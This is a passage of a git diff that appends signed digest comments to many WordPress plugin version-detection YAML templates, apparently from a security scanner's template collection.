b/http/technologies/wordpress/plugins/broken-link-checker.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a0048304602210086988b6efcd1141893e33a4220983a543c8250911f4054da8bb9d892e921ad4a022100ae73a9e98d98c6d11ebf3a3582629cf3c5f745facb8308a6ef3468cfe05aee64:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/chaty.yaml b/http/technologies/wordpress/plugins/chaty.yaml index 0cd866179e..30a55d1b5d 100644 --- a/http/technologies/wordpress/plugins/chaty.yaml +++ b/http/technologies/wordpress/plugins/chaty.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022100cf9b1703c0a74700f69f51c27929bd6e0e4df21b7f0c75905da720dd28433fd5022023635f8bfd5ea0bdc1460d2a1b1d9cdeda44711791d3ca62c9b7b07175eb32ec:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/child-theme-configurator.yaml b/http/technologies/wordpress/plugins/child-theme-configurator.yaml index b1d8479d13..0b12e46de3 100644 --- a/http/technologies/wordpress/plugins/child-theme-configurator.yaml +++ b/http/technologies/wordpress/plugins/child-theme-configurator.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a00463044022070ae72bfe9e99dc2c7b1f93e80cb54a64b6184f147b89cd7804128598f5c5e640220204ac57b72ed4d66058443b658b5770381586497405c6ffc79d3f7df3253b39c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/classic-editor.yaml b/http/technologies/wordpress/plugins/classic-editor.yaml index 04e090313f..6850b52b32 100644 --- a/http/technologies/wordpress/plugins/classic-editor.yaml +++ b/http/technologies/wordpress/plugins/classic-editor.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a0046304402201a67eed7e4dc051ac145b0ed06aabfab4d43f38e29ef899eeae432415d7e4d0102207d3ec956b29df4845c757d869c43952dbe632470d1886e07ef0e2857cb042580:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/classic-widgets.yaml b/http/technologies/wordpress/plugins/classic-widgets.yaml index 57e618924b..ecc37f8dd2 100644 --- a/http/technologies/wordpress/plugins/classic-widgets.yaml +++ b/http/technologies/wordpress/plugins/classic-widgets.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a0047304502204236ab02ebfcd21b6b4003ca3ab32867ab1d159a7532af1c54087f2d9eabead7022100b02e7457e862276020ffe5510707686674ece4a858077f9c664915168b768ccd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml index 571b3b20a3..329f3a288a 100644 --- a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml +++ b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a00483046022100d4c37a9eff836c38c389234925604e0341146e02a40b718ba38fb77d7e6c3a21022100d814d168e0cf85ea46923a8ccb45e4998465240945303c00d89d58eaca807bf0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cmb2.yaml b/http/technologies/wordpress/plugins/cmb2.yaml index 4d562316b4..c88cc5d4d7 100644 --- a/http/technologies/wordpress/plugins/cmb2.yaml +++ b/http/technologies/wordpress/plugins/cmb2.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022100986a758101f067d742b9a39c47f9036d6430c7913d9f02cb1303628b8b1b008c02202a7fdca97b7c266e18ee4caddd081e090a03f7b3721b96c5e632984cc9a0a2f5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/coblocks.yaml b/http/technologies/wordpress/plugins/coblocks.yaml index dcea952545..b66ccccb1f 100644 --- a/http/technologies/wordpress/plugins/coblocks.yaml +++ b/http/technologies/wordpress/plugins/coblocks.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a00483046022100a915656bda430482b6e70dc3d6b32a1dab6895c57d201722ae4b8febd228f53a022100ec7a0cb8ef0e6ff7934b5a57a78ae2c5b75bb56c0597bc56cb90d83761255ea8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/code-snippets.yaml b/http/technologies/wordpress/plugins/code-snippets.yaml index 0ae2f18122..67b6490da3 100644 --- a/http/technologies/wordpress/plugins/code-snippets.yaml +++ b/http/technologies/wordpress/plugins/code-snippets.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a0046304402205e6e4301153f03a3a191a04c568382bc2dcef44b2b842419d637b983bd889282022004885f776dc1365336f719802838564dfb6207af2681c9f62f134e6306869611:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/coming-soon.yaml b/http/technologies/wordpress/plugins/coming-soon.yaml index 12f549d536..1108f07635 100644 --- a/http/technologies/wordpress/plugins/coming-soon.yaml +++ b/http/technologies/wordpress/plugins/coming-soon.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022100a64efdfc9ed30e258aca50ea336142504077ef2d7de85f7e5a4e7803d5d1c5f002204a0650645b7323311a7c994224e1df054229e5bd297793dacafcd18af916b3f3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/complianz-gdpr.yaml b/http/technologies/wordpress/plugins/complianz-gdpr.yaml index d8ea6a72f1..1260647678 100644 --- a/http/technologies/wordpress/plugins/complianz-gdpr.yaml +++ b/http/technologies/wordpress/plugins/complianz-gdpr.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a00483046022100a796129c13c6e65e75c0a0c0645564dbe5a951d06386dcba8fc6018696c692aa022100dcde6f353aa8a067b01283c81e8b54387d4934c33936f66eff440caa726181f8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml index e13909fff3..0a831f8d23 100644 --- a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a00463044022019e7eae0bc8c6576473bf387af23abd4f67348937141432ef2b7b6e6a002b9bf02207210ea1d73af9740c3b4bd55a0ef3bb069eccffeb7182115f04c9f76391c3ceb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-7.yaml b/http/technologies/wordpress/plugins/contact-form-7.yaml index 88fea67f93..61ff0d0ce0 100644 --- a/http/technologies/wordpress/plugins/contact-form-7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022100c52d6480b6f9622c6816cd3486b90e9f93c23e7278655879fcd76f1ab9429d080220041c63c44499ba3878d043e496393389805ce9d0a78eb58260e2e2ae54d9486b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml index d205cdbf36..2851ea72f9 100644 --- a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a0047304502210081da7e0f612e9de8aeed53a1e71163e1697e29be3b325c4881c9010e4f46d8760220566b0e6734fce6a206ca050b084c7ff4ca3d48b356bac1deec38d5c884690165:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cookie-law-info.yaml b/http/technologies/wordpress/plugins/cookie-law-info.yaml index 3fa20df7d2..a8d37fbc63 100644 --- a/http/technologies/wordpress/plugins/cookie-law-info.yaml +++ b/http/technologies/wordpress/plugins/cookie-law-info.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022100e47e0c394c0de4062220715f1c047d5aa688494f0065db16a274572707cee5a102202c2242f786494a88c7936209dff2b611b2a0e8a8ed31d09c1088f56dd91d554e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cookie-notice.yaml b/http/technologies/wordpress/plugins/cookie-notice.yaml index bcd63ced86..35cccec2e2 100644 --- a/http/technologies/wordpress/plugins/cookie-notice.yaml +++ b/http/technologies/wordpress/plugins/cookie-notice.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a0046304402207f062ccf407ec442a9ba3e4c8cd5ea9e3c3891a186c4ea7d21f06ab9c2893877022061f0355d71f9ab693d465fe2d58a2ff1ca40e031425a091597f934c130e8de8c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/copy-delete-posts.yaml b/http/technologies/wordpress/plugins/copy-delete-posts.yaml index bca0326f2b..e8615710b8 100644 --- a/http/technologies/wordpress/plugins/copy-delete-posts.yaml +++ b/http/technologies/wordpress/plugins/copy-delete-posts.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a004630440220478e9f490a6c2f8159dbf65cfebe2fa04b1d389af4438ea3770e805ef228408b02202516b59df6a3f6c9371e9bb67b56e12f5fa8db02a0cd231495a0f5f1cd14c872:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml index 854328f04b..21e9217dcd 100644 --- a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml +++ b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a00483046022100f838d6f6758bfdec63f975675e63192452e78eb43c9e77c2d8e01a036bd7e051022100f267d138e2a04f5e4b31e23572cbf83d6fe5df246847267187ce5d672d423afb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml index 6d3f7f4566..d107ff40dd 100644 --- a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml +++ b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a004630440220726d4136b536254a938a3427607845fb49b3a47f613117183bd757affba1b608022041bd13d77ccea778dc5d3305ee6414cf20eb688d4e98088a015fb33678cc6874:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-css-js.yaml b/http/technologies/wordpress/plugins/custom-css-js.yaml index dafbd25c9e..067cb07c65 100644 --- a/http/technologies/wordpress/plugins/custom-css-js.yaml +++ b/http/technologies/wordpress/plugins/custom-css-js.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a00463044022005888690c296d3f9e8ce68cfd329d46cf64ade1ce8ad7857903cafead171f249022005f0b82f8e45df2e0bdd1822084b48d1211c8b0305622a8549a3204f0a3723cc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-fonts.yaml b/http/technologies/wordpress/plugins/custom-fonts.yaml index f10480fc8f..df8299e89d 100644 --- a/http/technologies/wordpress/plugins/custom-fonts.yaml +++ b/http/technologies/wordpress/plugins/custom-fonts.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a0047304502203d972c546ff4d9abf84f6a07a902b7196f6db15fe396c22fbdf912dc6a386da3022100aa5acfa749ed1310d9e3eb36a22de5e30c4ee7340246e011b2b03099c464f10f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml index 6c92091767..b3472b9aec 100644 --- a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml +++ b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a0047304502201c5f030988b8097b845a0f8687065ba3b863ea4a1d0928cbd480ffe26c2b82320221009a091437c910c7a1ca94272f001cae3f67627b98da681dbc8ef9d57793f850b0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/disable-comments.yaml b/http/technologies/wordpress/plugins/disable-comments.yaml index b25c6c9a9c..fcc464c369 100644 --- a/http/technologies/wordpress/plugins/disable-comments.yaml +++ b/http/technologies/wordpress/plugins/disable-comments.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a004730450221008dd88c3d86d078bbca869d0f2095c1880d5219e2ef9917057460b358ef07048202207232f49d11fb186dceb364688b1c619cc805c7bad890d03e85aa55fc211e22c6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/disable-gutenberg.yaml b/http/technologies/wordpress/plugins/disable-gutenberg.yaml index 1781172d05..a173ff5a2b 100644 --- a/http/technologies/wordpress/plugins/disable-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/disable-gutenberg.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a004730450220788c3c2d3956fc678eba6d1c474d2c3bb6e5be95df022d100c26a34fc95dd96d022100e22e9ab4813b5c3d94d0018ec693abb958ad25ce3dad2097ea33bbbbefb26d10:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicate-page.yaml b/http/technologies/wordpress/plugins/duplicate-page.yaml index 92c8ce3409..8ee01427b1 100644 --- a/http/technologies/wordpress/plugins/duplicate-page.yaml +++ b/http/technologies/wordpress/plugins/duplicate-page.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022100d2dac19f1c82172e42d4e67e9229c257a827757d332ce641d51006d05a04751702202b7b0b75ae4bdcb28b9bb53355e09e1e24a63df5e8e4eaf1ebec448b0e04a612:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicate-post.yaml b/http/technologies/wordpress/plugins/duplicate-post.yaml index eea42ed8da..26a2417a63 100644 --- a/http/technologies/wordpress/plugins/duplicate-post.yaml +++ b/http/technologies/wordpress/plugins/duplicate-post.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a0047304502207e6a8e061c926c146755856dc566fd7fdcd9f5cfc610fd51fdb51ee31a01509c022100fd8474f2369be9e3679cd0804da0c4ab0ec154a753cc83d186264bcb004601cd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicator.yaml b/http/technologies/wordpress/plugins/duplicator.yaml index bedb85a0eb..2ac0d95762 100644 --- a/http/technologies/wordpress/plugins/duplicator.yaml +++ b/http/technologies/wordpress/plugins/duplicator.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a00463044022056c22d35fb14aa42ba2102d9a616eaa132341797fe9038bbb82f53739a25fdd9022007db6d86959e15b2f46bb94ed77bcde03e8524dc1f4d707262eb5c8f728b73e1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml index 45bbbc71df..6595fc75d7 100644 --- a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml +++ b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a0046304402202598983556ee5a37dbf110ee530d4a75d4636b95ad0cca6410d274e235c8ad1a022030d2aae700ecd3d1816425826c86002796025fdb50e772d8ee9c98bc7ef0976f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml index 03befac73e..be304baaa7 100644 --- a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml +++ b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a00483046022100e419d05c5bccf50bbdfcd72d0164de2b4512a44a85c90ad377442feea54a33e2022100fc3a472eaa00749ad456a56fa2f45c67d5008b109154b3fb68e3eead776faa39:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml index fe4c223cba..c92a557541 100644 --- a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml +++ b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a00483046022100d43da5af14c842b12889c8c087d51f52866a2d2b71ebd3ea7a53bcf50a39706c022100b5c86b45da124fa9c4213ea2d715170ae410b9a581060c81727d0949d7206fd5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/elementor.yaml b/http/technologies/wordpress/plugins/elementor.yaml index 0db316d66d..d93da12825 100644 --- a/http/technologies/wordpress/plugins/elementor.yaml +++ b/http/technologies/wordpress/plugins/elementor.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a00483046022100a8f1d671bc3a1c5bb08616dea55f221000788ddb34ad63b7e25274d224ccc98c022100b4ab555f3c44326a7da89d24ec39cbb5f3d5cb6ad0a8a506ea0abb29d227a0b6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/elementskit-lite.yaml b/http/technologies/wordpress/plugins/elementskit-lite.yaml index 135639253d..a37badb9c9 100644 --- a/http/technologies/wordpress/plugins/elementskit-lite.yaml +++ b/http/technologies/wordpress/plugins/elementskit-lite.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022100b656b3c892a7913eb8afd2eb5f1683134633535b6d27fc5f51e3390ed261769c022056b21f1934a33c7d2ee9bb495796cde17fca0006eaeb129e8608358eaea1782a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/enable-media-replace.yaml b/http/technologies/wordpress/plugins/enable-media-replace.yaml index 540fbaf9ac..af60d93d06 100644 --- a/http/technologies/wordpress/plugins/enable-media-replace.yaml +++ b/http/technologies/wordpress/plugins/enable-media-replace.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a0048304602210085408a62ddc1a160b3346b1453306f413b3ef94c47977b51b38c007ef7ef7361022100d5b8edbb3884406b975d8e557bacc35f7613d6dfc907b9f369086f7bb7277862:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/envato-elements.yaml b/http/technologies/wordpress/plugins/envato-elements.yaml index 7e71b4736f..4983c5ee24 100644 --- a/http/technologies/wordpress/plugins/envato-elements.yaml +++ b/http/technologies/wordpress/plugins/envato-elements.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022100f3226219a0363bb09c8f6bfb864a3a61a06c750059cbcf2c734989ca124d6c4102204ee571b2d1616f58d1095f988e9f14cde3d432816fa0ad65ea5d62c7a8dc6fdf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml index 5ea77f898d..939c69c3aa 100644 --- a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml +++ b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a0047304502204d433c2b66b080555e9039867b9a433f476e6b809c295799ac1c6525475ca6bc022100d1b4229ebe4ecb1ae0cf70154ebe096943740e82290a0c9563cccfdad0e7da3c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml index fc498e67e6..6a5d2d1438 100644 --- a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml +++ b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a0047304502210088171cbd2949d7a40a2bdd258016196d9af6836a4475dffbae37f1b9931863da02200a7cfdaae27cc61d700559a870a656bf2d399a48db3b79562091d600edd02262:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/extendify.yaml b/http/technologies/wordpress/plugins/extendify.yaml index 554a7ddc52..3ca2e45f80 100644 --- a/http/technologies/wordpress/plugins/extendify.yaml +++ b/http/technologies/wordpress/plugins/extendify.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a0047304502210093595fe79c6b8af0bffcbe9d459e526fe23c6aaca5f8d9b43aeaed95475f693002200c5c54abd6603930b15c6f7239923fa3d026f9041f9fa18538d49971f418b8d9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml index 465aa93d57..84705f2eba 100644 --- a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022078765e6f80cba3969ddfc281b8749fc0d18f597f053419c7735a3d04177d4082022100a70a47cad2e8bdbab47c6f77f9180ef7ae2e7bd3a300d2097e3a410c8470aae8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fast-indexing-api.yaml b/http/technologies/wordpress/plugins/fast-indexing-api.yaml index 2a1b0e57a9..1b10e16957 100644 --- a/http/technologies/wordpress/plugins/fast-indexing-api.yaml +++ b/http/technologies/wordpress/plugins/fast-indexing-api.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a00483046022100f0788915ddc49423e1403c925d4723f2350b49c267e785e3a497a43e69db41e8022100d148e1bac8dd0c0e3691701d0b76a0a8c4c502a0d8d857f56f269b61be248d54:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/flamingo.yaml b/http/technologies/wordpress/plugins/flamingo.yaml index 033cc4bc3d..0a4d2f8720 100644 --- a/http/technologies/wordpress/plugins/flamingo.yaml +++ b/http/technologies/wordpress/plugins/flamingo.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a00483046022100c1324ef3f5b2470708702ea632a57f7fdac3acf04f3636ae30f79080cfc5b357022100caf6aa54f687a00de211e47b70d242f4d1867c71c2624025425c6c8ef33550ec:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fluent-smtp.yaml b/http/technologies/wordpress/plugins/fluent-smtp.yaml index 4a3dcbd210..9664219951 100644 --- a/http/technologies/wordpress/plugins/fluent-smtp.yaml +++ b/http/technologies/wordpress/plugins/fluent-smtp.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a0046304402206cbe33f47fb1b296a6922b9055e3c2c6d7ada9a07b6bc446c57acc23f53b2b550220606d568e9df85c9ac6e7189a2865300afbd7e6096f0326b26e80d3ef73eda0b6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fluentform.yaml b/http/technologies/wordpress/plugins/fluentform.yaml index 945ab6ad03..a230883ddc 100644 --- a/http/technologies/wordpress/plugins/fluentform.yaml +++ b/http/technologies/wordpress/plugins/fluentform.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022100d9d44eb75ca2b66bea5919430558280d0cf4521bbae14f35a001ab5441599d2702203ac320bd2d88e4615a618a028f53ea5abfb891596f08ab4d19b9f5a7ee9672d2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/font-awesome.yaml b/http/technologies/wordpress/plugins/font-awesome.yaml index 2072b51ab9..673a7146b4 100644 --- a/http/technologies/wordpress/plugins/font-awesome.yaml +++ b/http/technologies/wordpress/plugins/font-awesome.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a00483046022100abd31f4236f98a48d5c16dc6b52874dc91247fbc5c5c3282e73e43d65665daf0022100dce27a734627655a4b92e8535f47408976fbc464fe93ef7735549ee59a5d1200:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml index b509d8cc67..6ab6255615 100644 --- a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a00483046022100ffb1227a28bee13675d070e2e29276df5a45159306a0233c83f7d7ba557671d7022100e559a703f771a168ac9ddf4029a0811113ec2c80bca7a859e269a61fcf52d53f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/formidable.yaml b/http/technologies/wordpress/plugins/formidable.yaml index c984479bde..9c3fb59201 100644 --- a/http/technologies/wordpress/plugins/formidable.yaml +++ b/http/technologies/wordpress/plugins/formidable.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a0047304502204d0df91b337680d19ccf60f4605e6f33e607a35a981a40faf65c2a199213239a022100edce7abbb47e3d09542a0ff7ba900de84b1cdba7b1f9f35db0db1ad7e3fcd41a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/forminator.yaml b/http/technologies/wordpress/plugins/forminator.yaml index ce5dc03713..ccaf554943 100644 --- a/http/technologies/wordpress/plugins/forminator.yaml +++ b/http/technologies/wordpress/plugins/forminator.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a0047304502205aada77853653074ed220f363d22dfb1677cd376ed20c507c483b84a5a4c047e022100c66fb3db10802f905b0135ef8d8d60e44762f6ea9e3020ea81fa0e65dbb22292:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ga-google-analytics.yaml b/http/technologies/wordpress/plugins/ga-google-analytics.yaml index f5f3818ea2..ebf4f493e0 100644 --- a/http/technologies/wordpress/plugins/ga-google-analytics.yaml +++ b/http/technologies/wordpress/plugins/ga-google-analytics.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022100dff1d60a9bce5c0db4daee452ae3c19df058587326cc46ae20b140a7744fe76a022068c2e19dbde9beadd82d9872bf23dbc79b3664fd771f387813d183482e49ea14:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml index 7e5b54c12c..62c4d34c27 100644 --- a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml +++ 